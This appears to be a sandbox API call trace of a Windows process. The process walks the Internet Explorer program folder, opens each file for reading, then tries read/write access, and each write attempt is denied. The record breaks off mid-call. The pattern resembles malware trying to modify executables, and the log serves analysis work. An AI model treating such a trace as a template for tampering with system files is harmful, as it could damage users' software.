CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\ieinstal.exe" (normalized: "c:\\program files\\internet explorer\\ieinstal.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.528] GetFileType (hFile=0x360) returned 0x1 [0089.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0089.528] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.528] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.528] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.528] CloseHandle (hObject=0x360) returned 1 [0089.529] AreFileApisANSI () returned 1 [0089.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e308, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0089.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0089.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e308, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\ieinstal.exe") returned 48 [0089.529] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\ieinstal.exe" (normalized: "c:\\program files\\internet explorer\\ieinstal.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.529] GetLastError () returned 0x5 [0089.529] GetLastError () returned 0x5 [0089.529] SetLastError (dwErrCode=0x5) [0089.529] GetLastError () returned 0x5 [0089.529] SetLastError (dwErrCode=0x5) [0089.529] GetLastError () returned 0x5 [0089.529] SetLastError (dwErrCode=0x5) [0089.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0089.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0089.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0089.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.529] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a49fe45, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a49fe45, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a49fe45, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x36c00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ielowutil.exe", cAlternateFileName="")) returned 1 [0089.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0089.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0089.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0089.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0089.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0089.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0089.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0089.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0089.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0089.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a430 [0089.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0089.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0089.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0089.530] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.530] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.530] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.530] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0089.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.530] AreFileApisANSI () returned 1 [0089.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\ielowutil.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\ielowutil.exe", lpUsedDefaultChar=0x0) returned 49 [0089.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0089.530] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.530] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0089.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0089.530] AreFileApisANSI () returned 1 [0089.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0089.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x45e88 [0089.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\ielowutil.exe") returned 49 [0089.531] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\ielowutil.exe" (normalized: "c:\\program files\\internet explorer\\ielowutil.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.531] GetFileType (hFile=0x360) returned 0x1 [0089.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0089.532] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.532] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.532] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.532] CloseHandle (hObject=0x360) returned 1 [0089.532] AreFileApisANSI () returned 1 [0089.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0089.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46a58 [0089.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x46a58, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\ielowutil.exe") returned 49 [0089.532] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\ielowutil.exe" (normalized: "c:\\program files\\internet explorer\\ielowutil.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.532] GetLastError () returned 0x5 [0089.532] GetLastError () returned 0x5 [0089.533] SetLastError (dwErrCode=0x5) [0089.533] GetLastError () returned 0x5 [0089.533] SetLastError (dwErrCode=0x5) [0089.533] GetLastError () returned 0x5 [0089.533] SetLastError (dwErrCode=0x5) [0089.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0089.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0089.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0089.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0089.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.533] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a49fe45, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a49fe45, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a4c60b4, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x63800, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="IEShims.dll", cAlternateFileName="")) returned 1 [0089.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0089.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0089.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0089.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0089.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0089.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0089.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0089.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0089.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0089.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0089.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0089.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0089.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0089.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0089.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.534] AreFileApisANSI () returned 1 [0089.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\IEShims.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\IEShims.dll", lpUsedDefaultChar=0x0) returned 47 [0089.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0089.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0089.534] AreFileApisANSI () returned 1 [0089.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0089.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x717c0 [0089.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\IEShims.dll") returned 47 [0089.534] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files\\internet explorer\\ieshims.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0089.779] GetFileType (hFile=0x420) returned 0x1 [0089.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0089.779] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.782] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.783] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.784] CloseHandle (hObject=0x420) returned 1 [0089.789] AreFileApisANSI () returned 1 [0089.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0089.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0089.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\IEShims.dll") returned 47 [0089.790] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files\\internet explorer\\ieshims.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.790] GetLastError () returned 0x5 [0089.790] GetLastError () returned 0x5 [0089.790] SetLastError (dwErrCode=0x5) [0089.792] GetLastError () returned 0x5 [0089.792] SetLastError (dwErrCode=0x5) [0089.792] GetLastError () returned 0x5 [0089.792] SetLastError (dwErrCode=0x5) [0089.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0089.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0089.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0089.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.792] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa182b3a4, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa1c0b0e4, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x8ca44c00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xc9340, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="iexplore.exe", cAlternateFileName="")) returned 1 [0089.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0089.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0089.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0089.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0089.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0089.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0089.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0089.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0089.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0089.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0089.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0089.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0089.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.808] AreFileApisANSI () returned 1 [0089.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\iexplore.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\iexplore.exe", lpUsedDefaultChar=0x0) returned 48 [0089.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0089.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0089.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0089.816] AreFileApisANSI () returned 1 [0089.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0089.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0089.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 48 [0089.816] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0089.817] GetFileType (hFile=0x420) returned 0x1 [0089.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0089.817] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.817] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.817] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: 